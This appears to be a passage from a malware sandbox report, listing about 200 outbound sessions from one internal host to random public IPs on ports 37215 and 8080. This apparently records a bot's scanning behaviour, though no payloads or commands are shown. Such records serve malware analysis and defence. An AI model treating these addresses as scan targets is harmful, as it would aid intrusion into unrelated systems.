                                                        21609192.168.2.2334388197.29.177.24137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21610192.168.2.234782241.37.80.18237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21611192.168.2.234305441.124.130.637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21612192.168.2.233621641.198.85.25437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21613192.168.2.234993041.119.206.4537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21614192.168.2.2358608197.38.41.1037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21615192.168.2.2336720157.43.206.7937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21616192.168.2.2358960157.233.98.12437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21617192.168.2.2338806157.29.145.1837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21618192.168.2.2337816197.156.164.10437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21619192.168.2.233905041.179.14.5637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21620192.168.2.233969441.111.48.2337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21621192.168.2.234323641.124.56.7937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21622192.168.2.2336542197.162.176.20937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21623192.168.2.2359586197.2.140.14537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21624192.168.2.235550641.241.182.937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21625192.168.2.2355284197.1.131.8437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21626192.168.2.2349100157.110.51.1737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21627192.168.2.235526041.27.0.14837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21628192.168.2.234041053.176.127.2237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21629192.168.2.2353584197.158.104.22637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21630192.168.2.2351762197.31.87.14237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21631192.168.2.2352956113.92.187.23537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21632192.168.2.2344290170.47.17.19537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21633192.168.2.234724041.97.161.15737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21634192.168.2.2343682157.119.205.23437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21635192.168.2.2337166197.125.176.12037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21636192.168.2.233850241.183.192.21537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21637192.168.2.2349998213.183.52.16137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21638192.168.2.235541241.128.127.9837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21639192.168.2.2352038116.217.19.13037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21640192.168.2.233859841.225.237.18737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21641192.168.2.2352798157.184.229.10837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21642192.168.2.2360936199.168.229.13937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21643192.168.2.2357770163.111.244.12037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21644192.168.2.2339056157.181.214.16637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21645192.168.2.2348510157.232.49.25337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21646192.168.2.2332944157.73.172.10737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21647192.168.2.2333548180.107.225.19937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21648192.168.2.233556893.54.47.6937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21649192.168.2.2346762157.44.98.18837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21650192.168.2.2333130140.178.58.6037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21651192.168.2.2349380157.197.200.10337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21652192.168.2.234447641.196.105.2637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21653192.168.2.2344574163.228.88.18137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21654192.168.2.234669083.26.114.16037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21655192.168.2.234099241.221.252.23137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21656192.168.2.2337236197.81.169.1037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21657192.168.2.2341634197.210.54.1937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21658192.168.2.2333508197.93.98.25437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21659192.168.2.233813841.213.95.22337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21660192.168.2.234570841.109.222.20337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21661192.168.2.235250841.224.214.137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21662192.168.2.2346672197.246.254.12337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21663192.168.2.2354396157.43.128.21837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21664192.168.2.2349226197.96.85.19737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21665192.168.2.2336436197.27.62.18037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21666192.168.2.2337502197.134.174.8837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21667192.168.2.233426681.217.28.3237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21668192.168.2.2350298194.46.63.11037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21669192.168.2.2345544197.116.214.18937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21670192.168.2.23366948.238.106.16337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21671192.168.2.234379641.139.105.23837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21672192.168.2.2340746208.207.130.24637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21673192.168.2.2358906197.187.140.17037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21674192.168.2.234692441.182.205.16237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21675192.168.2.234056834.225.148.7937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21676192.168.2.2347054157.183.187.3837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21677192.168.2.2357254157.53.152.6637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21678192.168.2.235485423.57.187.4537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21679192.168.2.235010675.2.112.18037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21680192.168.2.2350004197.54.57.10737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21681192.168.2.2335426199.56.202.21837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21682192.168.2.2358368167.110.135.24637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21683192.168.2.235700641.85.169.23237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21684192.168.2.234998284.137.121.1978080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21685192.168.2.235956696.202.46.128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21686192.168.2.234903625.34.48.2258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21687192.168.2.2340282121.117.99.858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21688192.168.2.2336690101.141.157.2168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21689192.168.2.234651886.193.14.1258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21690192.168.2.2338868141.223.242.1998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21691192.168.2.2348692116.22.43.2008080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21692192.168.2.2350876212.21.114.98080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21693192.168.2.2346760180.190.134.748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21694192.168.2.2338344176.237.114.1198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21695192.168.2.2338524168.252.78.2348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21696192.168.2.2346694191.210.186.238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21697192.168.2.2332860137.83.213.1648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21698192.168.2.234841287.105.222.2018080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21699192.168.2.235367871.46.195.2068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21700192.168.2.2348192139.85.233.1268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21701192.168.2.2357100200.108.64.2348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21702192.168.2.235834468.37.227.2098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21703192.168.2.2356298130.202.9.1998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21704192.168.2.2349740218.249.143.2448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21705192.168.2.2344710175.50.141.288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21706192.168.2.2337732190.63.215.458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21707192.168.2.2346754126.17.111.1988080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21708192.168.2.233549883.134.209.2358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21709192.168.2.234057437.23.57.2068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21710192.168.2.2340378104.170.207.2458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21711192.168.2.234863250.183.42.1298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21712192.168.2.2354392208.84.152.1568080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21713192.168.2.235946083.204.142.408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21714192.168.2.2338922175.136.224.38080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21715192.168.2.234103086.67.15.1598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21716192.168.2.2333634211.192.22.1898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21717192.168.2.2348092118.229.239.758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21718192.168.2.2351828103.144.104.1188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21719192.168.2.2338242144.182.164.2428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21720192.168.2.2338108139.250.88.568080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21721192.168.2.2355188115.182.10.1308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21722192.168.2.235028445.162.236.938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21723192.168.2.2335876143.77.156.2008080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21724192.168.2.233975869.152.125.1108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21725192.168.2.2360726201.46.4.1338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21726192.168.2.234440294.35.247.648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21727192.168.2.2353824128.77.130.2388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21728192.168.2.2334164161.99.39.188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21729192.168.2.2347452208.225.177.318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21730192.168.2.235594817.57.116.1648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21731192.168.2.2346302142.6.233.1318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21732192.168.2.2354328136.193.165.308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21733192.168.2.2353968151.182.64.2488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21734192.168.2.2338838140.160.50.1028080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21735192.168.2.2336336129.13.179.1448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21736192.168.2.2345144143.235.105.328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21737192.168.2.233716858.97.48.1058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21738192.168.2.235473450.83.8.2498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21739192.168.2.233655893.26.113.1298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21740192.168.2.235844672.216.219.1748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21741192.168.2.2339354219.197.195.868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21742192.168.2.2350922187.38.23.528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21743192.168.2.234711450.147.233.1578080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21744192.168.2.235504013.89.152.468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21745192.168.2.2352636133.116.197.2088080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21746192.168.2.2350906221.32.119.1088080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21747192.168.2.2341398146.26.238.598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21748192.168.2.2347740164.2.21.1948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21749192.168.2.2350674189.100.66.1828080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21750192.168.2.2350760204.116.83.1098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21751192.168.2.2341332199.19.36.148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21752192.168.2.233575450.235.210.2368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21753192.168.2.2336888200.54.200.2048080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21754192.168.2.233384499.137.2.538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21755192.168.2.2342590155.41.106.1018080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21756192.168.2.234024838.195.197.2398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21757192.168.2.2348564137.163.205.1838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21758192.168.2.2354170168.51.243.198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21759192.168.2.235282083.49.36.2288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21760192.168.2.2354564211.70.46.1948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21761192.168.2.234884690.236.100.1698080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21762192.168.2.2360424204.29.94.2498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21763192.168.2.23480108.108.138.1638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21764192.168.2.2339520196.182.65.1028080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21765192.168.2.234134473.62.18.1568080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21766192.168.2.2358294182.56.250.2438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21767192.168.2.23419568.32.153.1268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21768192.168.2.234559477.136.97.138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21769192.168.2.2356024159.34.110.288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21770192.168.2.2352698167.211.214.1548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21771192.168.2.2350514114.152.203.548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21772192.168.2.2349494151.123.174.1788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21773192.168.2.233378499.207.6.2398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21774192.168.2.234826260.178.44.78080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21775192.168.2.2333744178.125.15.798080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21776192.168.2.234997470.80.255.148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21777192.168.2.2345830183.50.14.2558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21778192.168.2.235964051.196.144.1298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21779192.168.2.2353652223.127.157.868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21780192.168.2.2341170175.96.88.2258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21781192.168.2.2344966167.63.253.1548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21782192.168.2.2343434162.214.80.2178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21783192.168.2.2357616108.212.67.1498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21784192.168.2.2357996104.30.180.2288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21785192.168.2.233832025.187.76.2168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21786192.168.2.2352050205.176.198.2248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21787192.168.2.2358274110.220.225.1678080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21788192.168.2.23593129.169.17.1108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21789192.168.2.235507423.244.44.448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21790192.168.2.2348130216.92.120.2038080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21791192.168.2.2360852151.157.66.2168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21792192.168.2.233658485.68.10.1108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21793192.168.2.2340876185.67.208.648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21794192.168.2.2337022171.164.74.558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21795192.168.2.2333820157.252.233.2188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21796192.168.2.2360928207.56.62.1738080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21797192.168.2.2334718151.218.97.88080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21798192.168.2.2347852130.227.69.2148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21799192.168.2.235612043.202.202.1318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21800192.168.2.235721066.195.57.1498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21801192.168.2.2354948196.219.58.278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21802192.168.2.235109469.113.109.908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21803192.168.2.2339562209.171.166.2038080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21804192.168.2.233306447.213.26.1538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21805192.168.2.2345736161.204.24.1008080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21806192.168.2.2354296146.102.86.728080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21807192.168.2.234344882.49.66.838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21808192.168.2.2346430174.218.181.2158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21809192.168.2.2342206154.184.165.988080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21810192.168.2.2352568197.153.173.1728080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21811192.168.2.2347868159.128.69.468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21812192.168.2.2338140187.213.255.1258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21813192.168.2.2356570130.177.70.1468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21814192.168.2.2351548189.185.244.1468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21815192.168.2.235871049.45.45.2438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21816192.168.2.2350604186.77.143.2558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21817192.168.2.2354416114.226.106.2148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21818192.168.2.23397625.241.125.1908080
                                                        TimestampBytes transferredDirectionData


